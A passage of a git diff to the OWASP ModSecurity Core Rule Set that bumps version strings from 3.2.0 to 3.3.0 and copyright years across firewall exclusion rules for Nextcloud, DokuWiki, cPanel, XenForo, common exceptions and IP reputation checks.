least the iOS app does this) @@ -176,7 +176,7 @@ SecRule REQUEST_FILENAME "@contains /index.php/core/search" \ ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:query,\ ctl:ruleRemoveTargetById=941000-942999;ARGS:query,\ ctl:ruleRemoveTargetById=932000-932999;ARGS:query,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # [ DAV ] @@ -198,7 +198,7 @@ SecRule REQUEST_FILENAME "@rx /(?:remote|index|public)\.php/" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.allowed_methods=%{tx.allowed_methods} PUT PATCH CHECKOUT COPY DELETE LOCK MERGE MKACTIVITY MKCOL MOVE PROPFIND PROPPATCH UNLOCK REPORT TRACE jsonp'" @@ -212,7 +212,7 @@ SecRule REQUEST_FILENAME "@rx /ocs/v[0-9]+\.php/apps/files_sharing/" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.allowed_methods=%{tx.allowed_methods} PUT DELETE'" @@ -225,7 +225,7 @@ SecRule REQUEST_FILENAME "@contains /index.php/core/preview.png" \ t:none,\ nolog,\ ctl:ruleRemoveTargetById=932150;ARGS:file,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Filepreview for trashbin @@ -237,7 +237,7 @@ SecRule REQUEST_FILENAME "@contains /index.php/apps/files_trashbin/ajax/preview. nolog,\ ctl:ruleRemoveTargetById=932150;ARGS:file,\ ctl:ruleRemoveTargetById=942190;ARGS:file,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@rx /index\.php/(?:apps/gallery/thumbnails|logout$)" \ "id:9003160,\ @@ -246,7 +246,7 @@ SecRule REQUEST_FILENAME "@rx /index\.php/(?:apps/gallery/thumbnails|logout$)" \ t:none,\ nolog,\ ctl:ruleRemoveTargetById=941120;ARGS:requesttoken,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # [ Ownnote ] @@ -258,7 +258,7 @@ SecRule REQUEST_FILENAME "@contains /index.php/apps/ownnote/" \ t:none,\ nolog,\ ctl:ruleRemoveById=941150,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # [ Text Editor ] @@ -276,7 +276,7 @@ SecRule REQUEST_FILENAME "@contains /index.php/apps/files_texteditor/" \ ctl:ruleRemoveTargetById=932150;ARGS:filename,\ ctl:ruleRemoveTargetById=920370-920390;ARGS:filecontents,\ ctl:ruleRemoveTargetById=920370-920390;ARGS_COMBINED_SIZE,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # [ Address Book ] @@ -289,7 +289,7 @@ SecRule REQUEST_FILENAME "@contains /remote.php/dav/addressbooks/" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/vcard|'" # Allow modifying contacts via the web interface @@ -314,7 +314,7 @@ SecRule REQUEST_FILENAME "@contains /remote.php/dav/calendars/" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/calendar|'" @@ -330,7 +330,7 @@ SecRule REQUEST_FILENAME "@contains /index.php/apps/notes/" \ t:none,\ nolog,\ ctl:ruleRemoveByTag=attack-injection-php,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # [ Bookmarks ] @@ -344,7 +344,7 @@ SecRule REQUEST_FILENAME "@contains /index.php/apps/bookmarks/" \ t:none,\ nolog,\ ctl:ruleRemoveById=931130,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # @@ -363,7 +363,7 @@ SecRule REQUEST_FILENAME "@contains /index.php/login" \ nolog,\ ctl:ruleRemoveTargetById=941100;ARGS:requesttoken,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Reset password. @@ -373,7 +373,7 @@ SecRule REQUEST_FILENAME "@endsWith /index.php/login" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq resetpass" \ "t:none,\ @@ -394,7 +394,7 @@ SecRule REQUEST_FILENAME "@endsWith /index.php/settings/users" \ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:newuserpassword,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecMarker "END-NEXTCLOUD-ADMIN" diff --git a/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf b/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf index 432ab2de3..71738c259 100644 --- a/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf +++ b/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -26,7 +26,7 @@ SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-DOKUWIKI" SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \ @@ -35,7 +35,7 @@ SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-DOKUWIKI" @@ -80,7 +80,7 @@ SecRule REQUEST_FILENAME "@rx (?:/doku.php|/lib/exe/ajax.php)$" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQUEST_METHOD "@streq POST" \ "t:none,\ @@ -105,7 +105,7 @@ SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php" \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQUEST_METHOD "@streq POST" \ "t:none,\ @@ -124,7 +124,7 @@ SecRule REQUEST_FILENAME "@endsWith /doku.php" \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:do "@streq index" \ "t:none,\ @@ -148,7 +148,7 @@ SecRule REQUEST_FILENAME "@endsWith /doku.php" \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:do "@streq login" \ "t:none,\ @@ -169,7 +169,7 @@ SecRule ARGS:do "!@streq admin" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-DOKUWIKI-ADMIN" SecRule ARGS:do "!@streq admin" \ @@ -178,7 +178,7 @@ SecRule ARGS:do "!@streq admin" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-DOKUWIKI-ADMIN" @@ -193,7 +193,7 @@ SecRule REQUEST_FILENAME "@endsWith /doku.php" \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:do "@streq login" \ "t:none,\ @@ -219,7 +219,7 @@ SecRule REQUEST_FILENAME "@endsWith /doku.php" \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:page "@streq config" \ "t:none,\ @@ -251,7 +251,7 @@ SecRule REQUEST_FILENAME "@endsWith /doku.php" \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:page "@streq config" \ "t:none,\ diff --git a/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf b/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf index 6b49250cd..a92d8093c 100644 --- a/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf +++ b/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -18,7 +18,7 @@ SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-CPANEL" SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \ @@ -27,7 +27,7 @@ SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-CPANEL" @@ -52,7 +52,7 @@ SecRule REQUEST_LINE "@rx ^GET /whm-server-status(?:/|/\?auto)? HTTP/[12]\.[01]$ tag:'language-multi',\ tag:'platform-apache',\ tag:'attack-generic',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ "t:none,\ diff --git a/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf b/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf index 7ca9c1b93..7474d53ad 100644 --- a/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf +++ b/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -17,7 +17,7 @@ SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-XENFORO" SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \ @@ -26,7 +26,7 @@ SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-XENFORO" @@ -48,7 +48,7 @@ SecRule REQUEST_FILENAME "@endsWith /proxy.php" \ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:link,\ ctl:ruleRemoveTargetById=931130;ARGS:referrer,\ ctl:ruleRemoveTargetById=942230;ARGS:referrer,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Store drafts for private message, forum post, thread reply # POST /xf/conversations/draft @@ -72,7 +72,7 @@ SecRule REQUEST_FILENAME "@rx /(?:conversations|(?:conversations|forums|threads) ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Send PM, edit post, create thread, reply to thread # POST /xf/conversations/add @@ -99,7 +99,7 @@ SecRule REQUEST_FILENAME "@rx /(?:conversations/add(?:-preview)?|conversations/m ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Quote # POST /xf/posts/12345/quote @@ -110,7 +110,7 @@ SecRule REQUEST_FILENAME "@rx /posts/\d+/quote$" \ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:quoteHtml,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Multi quote # POST /xf/conversations/convo-title.12345/multi-quote @@ -133,7 +133,7 @@ SecRule REQUEST_FILENAME "@rx /(?:conversations|threads)/.*\.\d+/multi-quote$" \ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[7][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[8][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[9][value],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Delete thread # POST /xf/threads/thread-title.12345/delete @@ -144,7 +144,7 @@ SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/delete$" \ t:none,\ nolog,\ ctl:ruleRemoveTargetById=942130;ARGS:starter_alert_reason,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Feature thread # POST /xf/threads/thread-title.12345/feature-edit @@ -166,7 +166,7 @@ SecRule REQUEST_FILENAME "@endsWith /inline-mod/" \ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:author_alert_reason,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Warn member # POST /xf/members/name.12345/warn @@ -179,7 +179,7 @@ SecRule REQUEST_FILENAME "@rx /(?:members/.*\.\d+|posts/\d+)/warn$" \ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:conversation_message,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:notes,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Editor SecRule REQUEST_URI "@endsWith /index.php?editor/to-html" \ @@ -193,7 +193,7 @@ SecRule REQUEST_URI "@endsWith /index.php?editor/to-html" \ ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Editor SecRule REQUEST_URI "@endsWith /index.php?editor/to-bb-code" \ @@ -203,7 +203,7 @@ SecRule REQUEST_URI "@endsWith /index.php?editor/to-bb-code" \ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:html,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Post attachment # POST /xf/account/avatar @@ -219,7 +219,7 @@ SecRule REQUEST_FILENAME "@rx /(?:account/avatar|attachments/upload)$" \ ctl:ruleRemoveTargetById=942440;ARGS:flowIdentifier,\ ctl:ruleRemoveTargetById=942440;ARGS:flowFilename,\ ctl:ruleRemoveTargetById=942440;ARGS:flowRelativePath,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Media # POST /xf/index.php?editor/media @@ -231,7 +231,7 @@ SecRule REQUEST_URI "@endsWith /index.php?editor/media" \ nolog,\ ctl:ruleRemoveTargetById=931130;ARGS:url,\ ctl:ruleRemoveTargetById=942130;ARGS:url,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Emoji # GET /xf/index.php?misc/find-emoji&q=(%0A%0A @@ -242,7 +242,7 @@ SecRule REQUEST_URI "@rx /index\.php\?misc/find-emoji&q=" \ t:none,\ nolog,\ ctl:ruleRemoveTargetById=921151;ARGS:q,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Login # POST /xf/login/login @@ -253,7 +253,7 @@ SecRule REQUEST_FILENAME "@endsWith /login/login" \ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Register account # POST /xf/register/register @@ -268,7 +268,7 @@ SecRule REQUEST_FILENAME "@endsWith /register/register" \ nolog,\ ctl:ruleRemoveTargetById=942130;ARGS,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:reg_key,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Confirm account # GET /xf/account-confirmation/name.12345/email?c=foo @@ -290,7 +290,7 @@ SecRule REQUEST_FILENAME "@endsWith /account/account-details" \ nolog,\ ctl:ruleRemoveTargetById=931130;ARGS:custom_fields[picture],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:about_html,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Lost password # POST /xf/lost-password/user-name.12345/confirm?c=foo @@ -301,7 +301,7 @@ SecRule REQUEST_FILENAME "@rx /lost-password/.*\.\d+/confirm$" \ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:c,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Set forum signature # POST /xf/account/signature @@ -312,7 +312,7 @@ SecRule REQUEST_FILENAME "@endsWith /account/signature" \ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:signature_html,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Search # POST /xf/search/search @@ -327,7 +327,7 @@ SecRule REQUEST_FILENAME "@endsWith /search/search" \ ctl:ruleRemoveTargetById=942260;ARGS:constraints,\ ctl:ruleRemoveTargetById=942340;ARGS:constraints,\ ctl:ruleRemoveTargetById=942370;ARGS:constraints,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Search within thread # GET /xf/threads/foo.12345/page12?highlight=foo @@ -338,7 +338,7 @@ SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/(?:page\d+)?$" \ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:highlight,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Search within search result # GET /xf/search/12345/?q=foo @@ -349,7 +349,7 @@ SecRule REQUEST_FILENAME "@rx /search/\d+/$" \ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:q,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Contact form # POST /xf/misc/contact @@ -361,7 +361,7 @@ SecRule REQUEST_FILENAME "@endsWith /misc/contact" \ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:subject,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Report post # POST /xf/posts/12345/report @@ -372,7 +372,7 @@ SecRule REQUEST_FILENAME "@rx /posts/\d+/report$" \ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Alternate thread view route # /xf/index.php?threads/title-having-some-sql.12345/ @@ -387,7 +387,7 @@ SecRule REQUEST_FILENAME "@endsWith /index.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQUEST_METHOD "@streq GET" \ "t:none,\ @@ -411,7 +411,7 @@ SecRule REQUEST_URI "@endsWith /index.php?dbtech-security/fingerprint" \ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[14][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[15][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[16][value],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Get location info SecRule REQUEST_FILENAME "@endsWith /misc/location-info" \ @@ -421,7 +421,7 @@ SecRule REQUEST_FILENAME "@endsWith /misc/location-info" \ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:location,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # # -=[ XenForo Global Exclusions ]=- @@ -454,7 +454,7 @@ SecAction \ ctl:ruleRemoveTargetByTag=OWASP_CRS;REQUEST_COOKIES:xf_ls,\ ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_session,\ ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_user,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # # -=[ XenForo Administration Back-End ]=- @@ -468,7 +468,7 @@ SecRule REQUEST_FILENAME "!@endsWith /admin.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-XENFORO-ADMIN" SecRule REQUEST_FILENAME "!@endsWith /admin.php" \ @@ -477,7 +477,7 @@ SecRule REQUEST_FILENAME "!@endsWith /admin.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-XENFORO-ADMIN" # Admin edit user @@ -490,7 +490,7 @@ SecRule REQUEST_URI "@rx /admin\.php\?users/.*\.\d+/edit$" \ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[about],\ ctl:ruleRemoveTargetById=931130;ARGS:profile[website],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Admin save user # POST /xf/admin.php?users/the-user-name.12345/save @@ -509,7 +509,7 @@ SecRule REQUEST_URI "@rx /admin\.php\?users/.*\.\d+/save$" \ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[sexuality],\ ctl:ruleRemoveTargetById=931130;ARGS:custom_fields[picture],\ ctl:ruleRemoveTargetById=931130;ARGS:profile[website],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Admin edit forum notice @@ -523,7 +523,7 @@ SecRule REQUEST_URI "@rx /admin\.php\?notices/(?:.*\.)?\d+/save$" \ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Admin batch thread update # POST /xf/admin.php?threads/batch-update/action @@ -538,7 +538,7 @@ SecRule REQUEST_URI "@rx /admin\.php\?(?:threads|users)/batch-update/action$" \ ctl:ruleRemoveTargetById=942330;ARGS:criteria,\ ctl:ruleRemoveTargetById=942340;ARGS:criteria,\ ctl:ruleRemoveTargetById=942370;ARGS:criteria,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Edit forum theme # POST /xf/admin.php?styles/title.1234/style-properties/group&group=basic @@ -555,7 +555,7 @@ SecRule REQUEST_URI "@rx /admin\.php\?styles/" \ ctl:ruleRemoveTargetById=942340;ARGS:json,\ ctl:ruleRemoveTargetById=942370;ARGS:json,\ ctl:ruleRemoveTargetById=942440;ARGS:json,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Set forum options # POST /xf/admin.php?options/update @@ -566,7 +566,7 @@ SecRule REQUEST_URI "@rx /admin\.php\?options/update" \ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:options[boardInactiveMessage],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Edit pages/templates # POST /xf/admin.php?pages/0/save @@ -579,7 +579,7 @@ SecRule REQUEST_URI "@rx /admin\.php\?(?:pages|templates)/.*/save" \ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:template,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecMarker "END-XENFORO-ADMIN" diff --git a/rules/REQUEST-905-COMMON-EXCEPTIONS.conf b/rules/REQUEST-905-COMMON-EXCEPTIONS.conf index c91f1855e..75191b10c 100644 --- a/rules/REQUEST-905-COMMON-EXCEPTIONS.conf +++ b/rules/REQUEST-905-COMMON-EXCEPTIONS.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -23,7 +23,7 @@ SecRule REQUEST_LINE "@streq GET /" \ tag:'language-multi',\ tag:'platform-apache',\ tag:'attack-generic',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ "t:none,\ @@ -43,7 +43,7 @@ SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ tag:'language-multi',\ tag:'platform-apache',\ tag:'attack-generic',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQUEST_HEADERS:User-Agent "@endsWith (internal dummy connection)" \ "t:none,\ diff --git a/rules/REQUEST-910-IP-REPUTATION.conf b/rules/REQUEST-910-IP-REPUTATION.conf index b5ef84f1a..afb385529 100644 --- a/rules/REQUEST-910-IP-REPUTATION.conf +++ b/rules/REQUEST-910-IP-REPUTATION.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -39,8 +39,7 @@ SecRule TX:DO_REPUT_BLOCK "@eq 1" \ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'paranoia-level/1',\ - tag:'IP_REPUTATION/MALICIOUS_CLIENT',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain,\ skipAfter:BEGIN-REQUEST-BLOCKING-EVAL" @@ -69,7 +68,7 @@ SecRule TX:HIGH_RISK_COUNTRY_CODES "!@rx ^$" \ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule TX:REAL_IP "@geoLookup" \ @@ -123,7 +122,7 @@ SecRule IP:PREVIOUS_RBL_CHECK "@eq 1" \ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-RBL-LOOKUP" # @@ -146,7 +145,7 @@ SecRule &TX:block_suspicious_ip "@eq 0" \ t:none,\ nolog,\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain,\ skipAfter:END-RBL-CHECK" SecRule &TX:block_harvester_ip "@eq 0" \ @@ -167,7 +166,7 @@ SecRule TX:REAL_IP "@rbl dnsbl.httpbl.org" \ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.httpbl_msg=%{tx.0}',\ chain" SecRule TX:httpbl_msg "@rx RBL lookup of .*?.dnsbl.httpbl.org succeeded at TX:checkip. (.*?): .*" \ @@ -187,7 +186,7 @@ SecRule TX:block_search_ip "@eq 1" \ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain,\ skipAfter:END-RBL-CHECK" @@ -210,7 +209,7 @@ SecRule 